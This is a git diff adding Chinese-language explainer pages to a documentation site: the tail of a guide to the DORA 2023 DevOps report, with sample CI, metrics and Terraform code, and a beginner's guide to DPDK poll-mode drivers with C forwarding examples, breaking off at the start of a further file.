**前厅**是运维/SRE:要保证每桌菜热、上菜快、不出食品安全事故。 +- **顾客**是最终用户:他们不在乎你用了什么烤箱,只在乎「点的菜对不对、好不好吃、等多久」。 + +很多团队像只盯着后厨 KPI 的店长:今天出菜 200 份、换菜单 12 次、烤箱利用率 87%——数字很漂亮,但顾客抱怨「菜不对胃口」「等了一个小时」。**DORA 2023 报告的核心转向**就是:别只优化「出菜速度」,要问**顾客到底想吃什么**。 + +《Accelerate State of DevOps Report 2023》由 Google 旗下的 **DORA**(DevOps Research and Assessment)发布,基于 **36,000+** 名全球从业者的九年纵向调查,是软件交付领域规模最大、历时最长的实证研究之一。2023 版不再只讲「四个指标」,而是把**组织文化、用户中心、技术能力、文档、云弹性、公平分工**连成一张因果网。 + +## 这篇报告在说什么 + +| 维度 | 内容 | +|------|------| +| 标题 | Accelerate State of DevOps Report 2023 | +| 发布方 | DORA / Google Cloud | +| PDF | [2023 报告全文](https://services.google.com/fh/files/misc/2023_state_of_devops_report.pdf) | +| 官网 | [dora.dev/research/2023](https://dora.dev/research/2023/dora-report/) | +| 数据规模 | 9 年、36,000+ 受访者 | +| 2023 主题 | 文化奠基、用户中心、技术能力 × 文档放大、云要「弹性」而非「搬家」 | + +报告衡量三类**结果(outcomes)**: + +1. **组织绩效(Organizational performance)** — 为客户与社区创造价值,不止于营收。 +2. **团队绩效(Team performance)** — 团队能否通过创新与协作持续交付。 +3. **员工福祉(Employee well-being)** — 倦怠、满意度、安全感。 + +以及两类**能力面(capabilities)**: + +- **软件交付绩效** — 安全、高效地变更技术系统。 +- **运营绩效** — 面向用户的可靠性、质量与体验。 + +## 为什么值得读(零基础也能建立图景) + +如果你只听过「DevOps = 开发运维合并」,这份报告会给你**可量化的改进地图**: + +- 哪些做法真的关联更高绩效(不是博客里的玄学)。 +- 为什么 2023 年**用户中心**压过「功能工厂」思维。 +- 为什么「上了云」不等于「变快了」——**基础设施弹性**才是关键。 +- 为什么**文档**像阳光:有它时,CI、主干开发、SRE 实践的效力会成倍放大。 + +它和 [[chaos-engineering-netflix-2016]](生产环境受控实验)、[[spanner]](多副本一致性)、平台工程内部开发者体验等话题同属「大规模软件如何可靠交付」谱系;DORA 更偏**组织与流程的统计学证据**,而非单点技术方案。 + +## 核心概念 + +### 1. DORA 四个核心指标(仍有效,但 2023 更强调「为什么快」) + +软件交付领域最常用的四个度量,像餐厅的**运营仪表盘**: + +| 指标 | 英文 | 直觉含义 | 餐厅类比 | +|------|------|----------|----------| +| 部署频率 | Deployment frequency | 多久向生产交付一次变更 | 新菜/调价多久上一次桌 | +| 变更前置时间 | Lead time for changes | 从提交到上线的耗时 | 从定菜谱到顾客能点到 | +| 变更失败率 | Change failure rate | 部署导致生产故障的比例 | 新菜退菜/投诉比例 | +| 恢复时间 | Time to restore service | 事故后恢复服务的时间 | 停炉后多久恢复供餐 | + +DORA 把团队分为 **Elite / High / Medium / Low** 四档(每年门槛在变——九年前的高绩效今天可能只是及格线)。**重点**:指标是学习的起点,不是 KPI 鞭子;报告反复强调 **continuous improvement(持续改进)** 文化。 + +### 2. Westrum 组织文化(文化的可测量模型) + +Ron Westrum 将组织文化分为三类,DORA 用问卷把文化「算出来」: + +| 类型 | 特征 | 与绩效关系 | +|------|------|------------| +| **Pathological(病态)** | 信息 hoarding、部门墙、责备文化 | 技术能力难以落地 | +| **Bureaucratic(官僚)** | 规则优先、层级审批、慢决策 | 中等 | +| **Generative(生成式)** | 信任、协作、失败可讨论、使命共享 | **组织绩效高约 30%** | + +生成式文化像餐厅里**前厅后厨同桌开晨会**:昨天哪道菜退得多,一起查是配方、火候还是点单系统问题,而不是互相甩锅。 + +### 3. 2023 团队特质分类(Trait-based archetypes) + +报告用数据把团队聚成四类「气质」,便于对照自省: + +- **User-centric(用户中心)** — 理解用户需求、收集反馈、用体验指标驱动优先级。 +- **Feature-driven(功能驱动)** — 以产出功能数量、路线图打卡为主。 +- **Developing(发展中)** — 能力尚在建设,交付与运营都不突出。 +- **Balanced(均衡)** — 交付、运营、用户关注较平衡。 + +**用户中心团队**组织绩效平均高约 **40%**,工作满意度高约 **20%**。报告结论:光快不够,要快在**对的地方**。 + +### 4. 技术能力 × 文档的「放大效应」 + +2023 年最「反直觉」的发现之一:**高质量文档**让技术实践更有效。 + +- 有高质量文档时,**SRE 实践**对组织绩效的估计影响约为无文档时的 **1.4 倍**。 +- **主干开发(trunk-based development)** + 高质量文档,对组织绩效的影响可达 **12.8 倍**(相对低文档场景)。 +- 文档本身关联约 **25%** 更高的团队绩效。 + +比喻:CI/CD 是引擎,文档是**润滑剂和线路图**——没有手册,引擎转得再快也会装错零件。 + +### 5. 云与「基础设施弹性」(Infrastructure flexibility) + +- 使用**公有云**与约 **22%** 更高的基础设施弹性相关。 +- **弹性基础设施**与约 **30%** 更高的组织绩效相关。 +- 单纯 **lift-and-shift(把机房搬到云上不改架构)** 可能有害:你保留了数据中心的流程枷锁,却失去了熟悉环境的运维直觉。 + +弹性意味着:按需扩缩、托管服务、基础设施即代码、多区域、无状态设计——**用云的原生能力**,不是给旧服务器换地址。 + +### 6. 快速代码评审(Fast code reviews) + +代码评审速度是 2023 年软件交付绩效的强预测因子:**更快评审**关联约 **50%** 更高的软件交付绩效。慢评审像后厨每道菜都要店长签字——质量可能略好,但前置时间和团队流动性的代价巨大。 + +### 7. 公平分工与倦怠 + +- **公平分配工作**可降低倦怠,但对自认「代表性不足群体」倦怠改善不显著。 +- 代表性不足群体更常承担**重复性、低可见度**任务,倦怠更高。 +- **工作安全感**与约 **61%** 的倦怠下降相关。 + +### 8. AI 开发工具(2023 年的早期信号) + +超过半数受访者已在部分技术任务中使用 AI,对**员工福祉**有温和正向影响,但对交付绩效的预测力在 2023 年仍**弱于**文化、用户中心、文档等成熟能力。报告态度:有热情,但**广泛改变交付方式尚需时间**——这与「AI 主要加速写代码,而交付瓶颈常在协作、需求、评审」的观察一致。 + +## 代码示例一:用 GitHub Actions 实践持续集成(CI) + +DORA 将 **continuous integration** 列为关键技术能力:每次提交都触发自动化构建与测试,尽早发现集成问题。 + +```yaml +# .github/workflows/dora-ci.yml +# 对应 DORA 能力:Continuous integration + Trunk-based development +name: DORA-style CI + +on: + push: + branches: [main] # 主干开发:变更频繁合入 main + pull_request: + branches: [main] + +concurrency: + group: ci-${{ github.ref }} + cancel-in-progress: true # 新提交取消旧流水线,缩短反馈环 + +jobs: + verify: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - name: Install & test + run: | + npm ci + npm run lint + npm test -- --coverage + + - name: Build artifact + run: npm run build + + # 快速反馈 ≈ DORA「变更前置时间」的前半段 + - name: Publish test summary + if: always() + run: | + echo "## CI finished at $(date -u +%Y-%m-%dT%H:%M:%SZ)" >> $GITHUB_STEP_SUMMARY + echo "Deployment frequency improves when main is always green." >> $GITHUB_STEP_SUMMARY +``` + +这段流水线体现:**小批量、高频次、自动化验证**——精英团队往往每天多次部署,因为单次变更小、验证快、回滚容易。 + +## 代码示例二:从部署日志估算 DORA 四指标 + +下面用 TypeScript 演示如何从**部署事件表**粗算四个核心指标(教学用简化版;生产应接 CD 系统、事故工单、变更关联): + +```typescript +// scripts/dora-metrics.ts — 从部署/事故事件估算 DORA 四指标 +type DeployEvent = { + deployedAt: Date; + leadTimeHours: number; // commit → prod + failed: boolean; // 是否触发回滚/热修 +}; + +type Incident = { + startedAt: Date; + restoredAt: Date; +}; + +function deploymentFrequency(deploys: DeployEvent[], windowDays = 30): string { + const count = deploys.length; + const perDay = count / windowDays; + if (perDay >= 1) return `Elite-ish: ${perDay.toFixed(1)} deploys/day`; + if (perDay >= 1 / 7) return `High: ${(perDay * 7).toFixed(1)} deploys/week`; + if (perDay >= 1 / 30) return `Medium: ${(perDay * 30).toFixed(1)} deploys/month`; + return `Low: ${(perDay * 365).toFixed(0)} deploys/year`; +} + +function medianLeadTimeHours(deploys: DeployEvent[]): number { + const sorted = [...deploys].map((d) => d.leadTimeHours).sort((a, b) => a - b); + const mid = Math.floor(sorted.length / 2); + return sorted.length % 2 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2; +} + +function changeFailureRate(deploys: DeployEvent[]): number { + if (!deploys.length) return 0; + return deploys.filter((d) => d.failed).length / deploys.length; +} + +function medianTimeToRestore(incidents: Incident[]): number { + const hours = incidents.map( + (i) => (i.restoredAt.getTime() - i.startedAt.getTime()) / 3_600_000 + ); + hours.sort((a, b) => a - b); + const mid = Math.floor(hours.length / 2); + return hours.length % 2 ? hours[mid] : (hours[mid - 1] + hours[mid]) / 2; +} + +// 示例数据 +const deploys: DeployEvent[] = [ + { deployedAt: new Date(), leadTimeHours: 4, failed: false }, + { deployedAt: new Date(), leadTimeHours: 2, failed: false }, + { deployedAt: new Date(), leadTimeHours: 24, failed: true }, +]; + +console.log(deploymentFrequency(deploys)); +console.log("Median lead time (h):", medianLeadTimeHours(deploys)); +console.log("Change failure rate:", (changeFailureRate(deploys) * 100).toFixed(1) + "%"); +``` + +**读数方式**:先建立基线,再对照 DORA 年度基准;更重要的是看趋势和**与业务结果的关联**——用户满意度、收入、任务完成率是否随交付改进而上升。2023 报告建议把 **CSAT、任务完成率、HEART 框架指标** 与四个交付指标并排放仪表盘,避免「忘了顾客」。 + +## 代码示例三(补充):基础设施弹性 — Terraform 片段 + +弹性基础设施常用 **IaC + 托管服务 + 自动扩缩** 表达: + +```hcl +# infra/flexible-service.tf +# DORA 2023: infrastructure flexibility(非 lift-and-shift) + +resource "google_cloud_run_v2_service" "api" { + name = "user-api" + location = var.region + + template { + scaling { + min_instance_count = 0 # 闲时缩到零,弹性计费 + max_instance_count = 100 + } + containers { + image = var.container_image + resources { + limits = { + cpu = "2" + memory = "1Gi" + } + } + } + } +} + +# 多区域 = 故障域分散,支撑「运营绩效」 +resource "google_cloud_run_v2_service" "api_dr" { + count = var.enable_multi_region ? 1 : 0 + name = "user-api-dr" + location = var.dr_region + # ... 镜像与主区域一致,由 CI 同步部署 +} +``` + +这与「把 VM 原样搬进云」相反:利用 **Cloud Run / K8s HPA / 托管数据库** 等能力,让容量与故障恢复成为代码可版本化的一部分。 + +## 2023 五大发现(速查) + +1. **文化是地基** — 生成式文化 → 组织绩效约 **+30%**;安全感强 → 倦怠约 **-61%**。 +2. **以用户为中心** — 组织绩效约 **+40%**,满意度约 **+20%**;同时改善「做对的事」和「把事做对」。 +3. **文档放大技术能力** — 团队绩效约 **+25%**;SRE、主干开发等实践在好文档下效力显著放大。 +4. **云要弹性** — 公有云提升弹性;弹性基础设施 → 组织绩效约 **+30%**;忌 lift-and-shift。 +5. **公平分工与快速评审** — 公平分工降倦怠;快速代码评审 → 软件交付绩效约 **+50%**。 + +## 团队如何落地(零基础行动清单) + +### 第一步:照镜子,别只追 Elite 标签 + +用 [DORA Quick Check](https://dora.dev/quickcheck/) 或内部问卷评估四指标与文化。把结果当作**体检报告**,不是排名榜。 + +### 第二步:建立用户反馈闭环 + +- 产品/工程同看:**任务完成率、CSAT、支持工单主题**。 +- 低延迟渠道:应用内反馈、每周用户访谈、发布说明下的「这解决你的问题吗?」。 +- 优先级会议先问:**「哪条用户证据支持我们做这个?」** + +### 第三步:投资「可发现的」文档 + +- README:如何本地跑、如何部署、如何 oncall。 +- ADR(架构决策记录):为什么选 A 不选 B。 +- Runbook:告警时第一步做什么。 +- 把文档质量纳入 PR 检查(见示例一 CI 可扩展 `docs/` 链接检查)。 + +### 第四步:缩短评审与集成分支寿命 + +- 小 PR(< 400 行)、24 小时内首次评审。 +- 主干开发 + 功能开关,减少长期 feature branch。 +- 与 [[chaos-engineering-netflix-2016]] 互补:快交付 + 生产实验验证韧性。 + +### 第五步:检查云是否「真弹性」 + +审计清单:能否自动扩缩?数据库是否托管?配置是否 IaC?多区域是否演练过?若答案多为否,可能仍在 lift-and-shift 舒适区。 + +## 常见误区 + +| 误区 | 报告怎么说 | +|------|------------| +| DevOps = 买一堆工具 | 文化与用户中心预测力常强于单点工具 | +| 功能越多越好 | Feature-driven 不如 User-centric 关联组织绩效 | +| 上云就更快 | 无弹性的云迁移可能更差 | +| 文档以后补 | 文档是技术能力的「倍增器」,不是附录 | +| 四个指标达标就毕业 | 持续改进;九年 Elite 门槛一直在升 | +| AI 会自动解决交付 | 2023 年 AI 对绩效影响仍早期,先夯实文化与流程 | + +## 与其他知识的关系 + +- **SRE / 错误预算** — 运营绩效侧;DORA 证明 SRE 在好文档下对组织绩效影响更大。 +- **平台工程** — 2023 报告首次更多提及;内部开发者也是「用户」,与 User-centric 一致。 +- **精益 / 精益创业** — Build-Measure-Learn 与 DORA 用户反馈环同构。 +- **团队拓扑** — Loosely coupled teams 与 DORA 技术能力一致;见相关组织设计读物。 + +## 小结 + +DORA 2023 用大规模调查说明:**软件交付卓越不是单一技巧,而是文化、用户理解、技术实践、文档与基础设施的共同产物**。像经营餐厅——后厨效率重要,但若从不听顾客,出菜再快也是在浪费食材。 + +对你而言,读完不必背诵「40%」「12.8 倍」,而应带走三个问题: + +1. 我们上次根据**真实用户反馈**调整优先级是什么时候? +2. 新人能否仅凭文档在一天内跑通构建、测试、部署? +3. 我们的云是**弹性**的,还是**搬家**的? + +从其中一条开始实验,度量,再改进——这正是 DORA 所说的 **get better at getting better**。 + +## 延伸阅读 + +- [DORA 2023 报告 PDF](https://services.google.com/fh/files/misc/2023_state_of_devops_report.pdf) +- [DORA Capabilities 目录](https://dora.dev/capabilities/) +- [User-centric focus 能力页](https://dora.dev/capabilities/user-centric-focus/) +- Nicole Forsgren, Jez Humble, Gene Kim — *Accelerate*(DORA 四指标原书) +- Ron Westrum — 组织文化类型学(生成式文化理论基础) diff --git a/src/content/docs/papers/dpdk-poll-mode-driver.md b/src/content/docs/papers/dpdk-poll-mode-driver.md new file mode 100644 index 000000000..e172e6443 --- /dev/null +++ b/src/content/docs/papers/dpdk-poll-mode-driver.md @@ -0,0 +1,321 @@ +--- +title: Data Plane Development Kit (DPDK) Architecture — 用户态线速网络栈零基础导读 +来源: https://www.dpdk.org/wp-content/uploads/sites/35/2014/09/DPDK-SFSummit2014-HighPerformanceNetworkingLeveragingDPDK-Brief.pdf +日期: 2026-06-13 +子分类: 内核与虚拟化 +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象一家**超繁忙的快递分拣中心**: + +- **传统内核网络栈**像「电话通知制」:每来一车货,分拣员放下手头工作接电话、跑去门口接货、登记入库、再回来继续——**中断(interrupt)** 打断了流水线,而且登记处(内核协议栈)要经过多层审批,小包多时 CPU 全耗在「接电话」上。 +- **DPDK** 的做法是:在分拣中心门口派一个**专职盯传送带的人**(poll mode),**不接电话、不等人叫**,而是每隔几微秒抬头看一眼「皮带上有没有新包裹」——有就一把抓一批(burst),没有就继续看。为了不被操作系统打扰,这个人还**独占一个工位**(绑核)、用**超大号托盘**搬货(hugepage)、和隔壁工位用**无锁传送带**递包裹(lockless ring)。 + +Intel 在 2014 年 SF Summit 的 briefing《High Performance Networking Leveraging DPDK》里概括了这套思路的起源:数据中心流量爆炸,**10G/40G 线速**要求每包 CPU 预算降到几十纳秒级,而传统「中断 + 内核拷贝 + 系统调用」的路径在百万 PPS 下根本撑不住。DPDK(Data Plane Development Kit)把**网卡驱动、内存管理、无锁队列**整套搬到**用户态**,用 **Poll Mode Driver(PMD)** 轮询收发包,成为 NFV、5G UPF、云网关、负载均衡器的工业标准底座。 + +> 定位澄清:DPDK **不是**一个完整的 TCP/IP 协议栈,而是**数据面基础设施**——你仍然可以叠 F-Stack、VPP、OVS-DPDK 或自研 L3/L4 逻辑在它上面。 + +## 为什么需要 DPDK + +### 内核网络栈的瓶颈 + +| 问题 | 具体表现 | +|------|----------| +| 中断开销 | 高频小包下,CPU 时间耗在中断上下文切换,而非业务逻辑 | +| 内核拷贝 | sk_buff 分配、协议栈层层拷贝,cache miss 严重 | +| 锁竞争 | 多核共享 socket、qdisc、路由表,锁与 cache line 乒乓 | +| 调度不确定性 | 线程被内核抢占,延迟尾(p99/p999)拉长 | +| 每包 syscall | `read`/`send` 路径无法批量摊薄固定成本 | + +### DPDK 的取舍 + +| 得到 | 付出 | +|------|------| +| 线速收发包(单核百万 PPS 级) | 需**独占 CPU 核心**做 poll,空载也占满一核 | +| 用户态直接操作 DMA 描述符 | 绕过内核网络栈,**失去** socket API、iptables 等现成设施 | +| 预分配内存池、零拷贝倾向 | 启动时吃满 hugepage,内存占用「看起来很大」 | +| 可预测的微秒级延迟 | 应用要自己处理多核模型、NUMA、丢包策略 | + +Briefing 强调:DPDK 的目标不是替代 Linux,而是让**数据面**(forwarding、分类、封装)从**控制面**(路由协议、管理面 CLI)里拆出来——这与后来的 Arrakis、IX、VPP 控制/数据分离一脉相承。 + +## 整体架构 + +```text +┌─────────────────────────────────────────────────────────────┐ +│ 你的应用 (l2fwd / VPP / OVS / 自研) │ +├─────────────────────────────────────────────────────────────┤ +│ librte_ethdev (PMD API) │ librte_mbuf │ librte_ring │ +│ librte_mempool │ librte_hash │ librte_lpm ... │ +├─────────────────────────────────────────────────────────────┤ +│ EAL — Environment Abstraction Layer │ +│ 绑核 / hugepage / PCI 映射(UIO/VFIO) / 日志 / 定时器 / IPC │ +├─────────────────────────────────────────────────────────────┤ +│ Poll Mode Drivers (ixgbe / i40e / mlx5 / virtio ...) │ +├─────────────────────────────────────────────────────────────┤ +│ 网卡硬件 (RX/TX rings, DMA, RSS, checksum offload) │ +└─────────────────────────────────────────────────────────────┘ + ▲ 绕过传统内核网络栈(数据面在用户态) + │ 控制面仍可走 Linux(配置 IP、路由、BGP…) +``` + +## 核心概念 + +### 1. EAL — 环境抽象层 + +EAL 是 DPDK 的「开机固件」。应用启动时第一个调用 `rte_eal_init()`,由它完成: + +- 解析命令行:`-l` 绑定逻辑核、`-n` 内存通道、`--socket-mem` 按 NUMA 预分配、`--huge-dir` 指定大页挂载点; +- 通过 **VFIO/UIO** 把 PCIe 网卡 BAR 空间 **mmap** 进用户态; +- 在 **hugetlbfs** 上分配物理连续、TLB 友好的内存; +- 区分 **master lcore**(做全局初始化)与 **worker lcore**(跑数据面循环)。 + +没有 EAL,后面的 mempool、PMD、ring 都无法在「裸金属式」环境里落地。 + +### 2. PMD — Poll Mode Driver + +PMD 是 DPDK 的名片:**不用 RX 中断**(链路状态变化中断除外),由应用在循环里调用 `rte_eth_rx_burst()` / `rte_eth_tx_burst()` **批量**拉取或提交报文。 + +关键设计原则(官方 PMD 架构文档与 2014 briefing 一致): + +- **Burst-oriented**:一次处理 32/64 个包,摊薄函数调用与 PCIe 门铃开销; +- **零拷贝倾向**:DMA 直接写入 `rte_mbuf` 数据区,驱动填好 descriptor 元数据; +- **Per-queue 独占**:典型部署「一核一网卡队列」,避免跨核抢锁; +- **硬件 offload**:RSS、checksum、TSO、VLAN strip 的结果写进 `rte_mbuf` 元数据字段。 + +两种主流编程模型: + +| 模型 | 行为 | 适用 | +|------|------|------| +| **Run-to-completion** | 同一核上收包 → 处理 → 发包 | 简单转发、L2/L3 网关 | +| **Pipeline** | RX 核把 `rte_mbuf` 指针经 `rte_ring` 扔给 worker 核 | 复杂处理、多阶段流水线 | + +### 3. rte_mempool 与 rte_mbuf + +**mempool** 是预分配的**对象池**(通常是 `rte_mbuf`),启动时一次性从 hugepage 切好,运行时 **O(1)** 借还,避免 `malloc` 与内核伙伴系统。 + +**mbuf**(`struct rte_mbuf`)是 DPDK 的「快递单 + 包裹」: + +- **metadata**:包长、端口、RSS hash、VLAN、offload 标志、引用计数; +- **data buffer**:实际帧字节,带 `RTE_PKTMBUF_HEADROOM` 便于封装头部; +- **chaining**:大包可分多个 segment 链表; +- **indirect mbuf**:克隆/广播时共享同一块数据区,避免复制。 + +mbuf 从哪个 pool 分配,释放时就回哪个 pool——**无 GC**,路径确定性极高。 + +### 4. rte_ring — 核间无锁 FIFO + +`rte_ring` 是实现 pipeline 的「传送带」:**多生产者 / 多消费者** 的无锁环形队列(基于 CAS 更新 head/tail)。相比内核 pipe 或 mutex 队列,它针对 **bulk enqueue/dequeue** 优化,且要求运行在 **DPDK 绑定的非抢占 lcore** 上(否则 preempt 会破坏无锁假设)。 + +mempool 内部也用 ring 管理空闲对象;应用层则用它做 **producer → consumer** 报文传递。 + +### 5. NUMA 与本地内存 + +Briefing 与后续文档反复强调:**网卡、内存、处理核应在同一 NUMA node**。跨 node 访问远程内存会让 PCIe 吞吐白白损失。实践规则: + +- 在 `socket_id = rte_eth_dev_socket_id(port)` 对应的 node 上 `rte_pktmbuf_pool_create()`; +- RX/TX descriptor ring 里的 mbuf 全部来自该本地 pool; +- `rte_eth_dev_configure()` 的 `rx_queues` / `tx_queues` 与 lcore 一一绑定。 + +### 6. Hugepage + +默认 4KiB 页:百万级 mbuf 会让 TLB **疯狂 miss**。DPDK 默认走 **2MB / 1GB hugepage**,把 TLB 压力降一个数量级。部署前通常需要: + +```bash +# Linux 示例:预留 1024 个 2MB 大页(约 2GB) +echo 1024 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages +sudo mkdir -p /mnt/huge +sudo mount -t hugetlbfs nodev /mnt/huge +``` + +应用通过 EAL 参数 `--socket-mem=2048` 等在这些大页上建 mempool。 + +## 代码示例一:最小 EAL 初始化 + 端口配置骨架 + +下面片段展示典型 DPDK 应用的**启动序列**(改编自官方 `basicfwd` / `l2fwd` 样例结构,省略错误处理细节): + +```c +#include +#include +#include + +#define RX_RING_SIZE 1024 +#define TX_RING_SIZE 1024 +#define NUM_MBUFS 8191 +#define MBUF_CACHE_SIZE 250 +#define BURST_SIZE 32 + +static const struct rte_eth_conf port_conf_default = { + .rxmode = { .max_lro_pkt_len = RTE_ETHER_MAX_LEN }, +}; + +int main(int argc, char **argv) +{ + struct rte_mempool *mbuf_pool; + uint16_t portid; + + /* 1. EAL:绑核、hugepage、PCI 探测 */ + int ret = rte_eal_init(argc, argv); + if (ret < 0) + rte_exit(EXIT_FAILURE, "EAL init failed\n"); + + argc -= ret; + argv += ret; + + /* 2. 检查可用以太网端口 */ + if (rte_eth_dev_count_avail() == 0) + rte_exit(EXIT_FAILURE, "No Ethernet ports\n"); + + /* 3. 在网卡所在 NUMA node 创建 mbuf 池 */ + mbuf_pool = rte_pktmbuf_pool_create( + "MBUF_POOL", NUM_MBUFS, MBUF_CACHE_SIZE, 0, + RTE_MBUF_DEFAULT_BUF_SIZE, rte_socket_id()); + + /* 4. 配置每个端口:1 RXQ + 1 TXQ,挂接 mbuf pool */ + RTE_ETH_FOREACH_DEV(portid) { + struct rte_eth_rxconf rxq_conf = + dev_info.default_rxconf; + struct rte_eth_txconf txq_conf = + dev_info.default_txconf; + + ret = rte_eth_dev_configure(portid, 1, 1, &port_conf_default); + ret = rte_eth_rx_queue_setup(portid, 0, RX_RING_SIZE, + rte_eth_dev_socket_id(portid), &rxq_conf, mbuf_pool); + ret = rte_eth_tx_queue_setup(portid, 0, TX_RING_SIZE, + rte_eth_dev_socket_id(portid), &txq_conf); + ret = rte_eth_dev_start(portid); + rte_eth_promiscuous_enable(portid); + } + + /* 5. 各 worker lcore 进入 lcore_launch 跑收发包循环 */ + rte_eal_mp_remote_launch(lcore_main, NULL, CALL_MAIN); + rte_eal_mp_wait_lcore(); + return 0; +} +``` + +要点:**EAL init → mempool → eth_dev configure/queue setup → start → 绑核循环**。任何一步漏掉 NUMA 对齐,性能都会「看起来能跑、一压测就塌」。 + +## 代码示例二:Run-to-completion 收发包循环 + +这是 PMD **poll 模式**的心脏——没有 `select`,没有阻塞 `read`,只有持续的 **rx_burst → 处理 → tx_burst**: + +```c +static int lcore_main(void *arg) +{ + const uint16_t portid = 0; /* 简化:单端口 */ + const uint16_t queueid = 0; + struct rte_mbuf *bufs[BURST_SIZE]; + const uint16_t nb_ports = rte_eth_dev_count_avail(); + + printf("Core %u forwarding packets\n", rte_lcore_id()); + + for (;;) { + /* 轮询 RX:一次最多收 BURST_SIZE 个包 */ + uint16_t nb_rx = rte_eth_rx_burst(portid, queueid, + bufs, BURST_SIZE); + if (unlikely(nb_rx == 0)) + continue; + + for (uint16_t i = 0; i < nb_rx; i++) { + struct rte_mbuf *m = bufs[i]; + /* 读 L2 头示例:以太网目的 MAC 在 buf_addr + data_off */ + struct rte_ether_hdr *eth = + rte_pktmbuf_mtod(m, struct rte_ether_hdr *); + (void)eth; /* 实际应用:ACL、meter、改写 TTL… */ + } + + /* 简易 L2 转发:从 port 0 收到,从 port 1 发出 */ + const uint16_t dst_port = (portid + 1) % nb_ports; + uint16_t nb_tx = 0; + while (nb_tx < nb_rx) { + uint16_t sent = rte_eth_tx_burst(dst_port, queueid, + &bufs[nb_tx], nb_rx - nb_tx); + nb_tx += sent; + } + + /* 未发完的 mbuf 必须释放,否则泄漏 pool */ + if (unlikely(nb_tx < nb_rx)) { + for (uint16_t i = nb_tx; i < nb_rx; i++) + rte_pktmbuf_free(bufs[i]); + } + } + return 0; +} +``` + +注意 `rte_eth_tx_burst()` **可能一次发不完**——网卡 TX ring 满时要重试或释放未发送的 mbuf。生产代码还会统计 `imissed`、`ierrors`、做 QoS 限速。 + +## Pipeline 模型补充:rte_ring 传递 mbuf + +当单核跑不完复杂逻辑时,RX 核只做「收包入队」: + +```c +struct rte_ring *ring = rte_ring_create("RX_TO_WORKER", + 4096, rte_socket_id(), RING_F_SP_ENQ | RING_F_SC_DEQ); + +/* RX lcore */ +uint16_t n = rte_eth_rx_burst(port, q, bufs, BURST_SIZE); +rte_ring_sp_enqueue_bulk(ring, (void **)bufs, n, NULL); + +/* Worker lcore */ +uint16_t m = rte_ring_sc_dequeue_burst(ring, (void **)bufs, BURST_SIZE, NULL); +/* …处理后再 tx_burst 或转发到下一级 ring… */ +``` + +`SP`/`SC`(单生产者单消费者)模式最快;多 worker 时用默认 MP/MC 模式。 + +## 与内核栈、XDP、io_uring 的对比 + +| 维度 | 内核网络栈 | DPDK PMD | Linux XDP | io_uring(网络扩展) | +|------|-----------|----------|-----------|---------------------| +| 运行态 | 内核 | 用户态 | 内核最早 hook | 用户态提交、内核执行 | +| 触发方式 | 中断驱动为主 | 轮询为主 | 可中断可 busy-poll | 事件驱动 | +| API 风格 | socket | `rte_eth_*` burst | BPF + redirect | 环形队列 | +| 隔离性 | 进程间强隔离 | 需信任应用 | 有 verifier | 依赖内核 | +| 典型场景 | 通用服务器 | NFV/网关/UPF | 可编程早期过滤 | 通用异步 IO | + +eBPF/XDP 适合「在现有栈里加可编程钩子」;DPDK 适合「**整块数据面搬出内核**换极致吞吐」。二者也常组合:XDP 做早期丢弃,DPDK 做 heavy forwarding。 + +## 部署与运维要点 + +1. **CPU 隔离**:`isolcpus` + `taskset` 或 cgroup cpuset,防止 Linux 调度器把其他进程塞进 DPDK 核。 +2. **大页预留**:容器里跑 DPDK 需挂载 hugepage volume(K8s `emptyDir medium: HugePages`)。 +3. **VFIO 而非 UIO**:现代部署优先 `vfio-pci`,IOMMU 隔离更安全。 +4. **链路状态**:PMD 对链路 up/down 可能用中断回调;数据面仍是 poll。 +5. **功耗**:纯 poll 空转费电;低流量时可切 **interrupt mode** 或 **rte_power** 降频(有性能代价)。 + +## 生态与后续影响 + +2014 briefing 发布时,DPDK 主要由 Intel 主导,驱动覆盖 1G/10G/40G;如今(DPDK 26.x)已演进为 **Linux Foundation 开源项目**,驱动涵盖 mlx5、AWS ENA、virtio-user、crypto、eventdev、GPU DMA 等。 + +下游项目: + +- **OVS-DPDK** / **VPP** — 开源虚拟交换与路由; +- **SPDK** — 同一套 EAL + hugepage 思路用于 NVMe 存储; +- **FD.io VPP、Open vSwitch、TRex** 流量发生器; +- 云厂商 **智能网卡(SmartNIC)** 把部分 PMD 逻辑下沉硬件。 + +学术上,IX(OSDI'14)用 DPDK 做数据面、Arrakis 强调控制面分离、Demikernel 统一 RDMA/DPDK——**「用户态数据面 + 内核控制面」** 成为数据中心共识。 + +## 学习路径建议 + +1. 读官方 [DPDK Programmer's Guide — Overview](https://doc.dpdk.org/guides/prog_guide/overview.html) 与 [Poll Mode Driver](https://doc.dpdk.org/guides/prog_guide/poll_mode_drv.html)。 +2. 跑通 `dpdk/examples/l2fwd` 与 `rxtx_callbacks`,用 `testpmd` 熟悉 burst 与 offload 标志位。 +3. 用 `perf` / `rte_eth_stats_get()` 观察 `ipackets`、`imissed`、`rx_nombuf`(pool 耗尽信号)。 +4. 读 **IX、Arrakis** 笔记,理解 DPDK 在「数据面 OS」大图里的位置。 + +## 小结 + +DPDK 的本质不是「又一个网卡驱动」,而是一套**为用户态线速转发定制的运行时**:EAL 屏蔽 OS 差异,hugepage + mempool 消灭分配抖动,mbuf 统一报文元数据,rte_ring 连接流水线各段,PMD 用 **burst poll** 把 PCIe 与 CPU cache 喂饱。代价是独占核心、放弃内核 socket 语义、直面 NUMA 与内存预分配——**用运维复杂度换每包纳秒级成本**,这正是 100G 时代 NFV 和云原生网关愿意买单的原因。 + +## 参考 + +- [High Performance Networking Leveraging DPDK (SF Summit 2014 Briefing PDF)](https://www.dpdk.org/wp-content/uploads/sites/35/2014/09/DPDK-SFSummit2014-HighPerformanceNetworkingLeveragingDPDK-Brief.pdf) +- [DPDK Programmer's Guide — Overview](https://doc.dpdk.org/guides/prog_guide/overview.html) +- [DPDK Poll Mode Driver Architecture](https://doc.dpdk.org/guides/prog_guide/poll_mode_drv.html) +- [DPDK Mbuf Library](https://doc.dpdk.org/guides/prog_guide/mbuf_lib.html) +- [DPDK Ring Library](https://doc.dpdk.org/guides/prog_guide/ring_lib.html) +- [IX: A Protected Dataplane Operating System (OSDI'14)](/papers/ix-2014) diff --git a/src/content/docs/papers/dpo.md b/src/content/docs/papers/dpo.md index 2b3a4e7bd..040f112c1 100644 --- 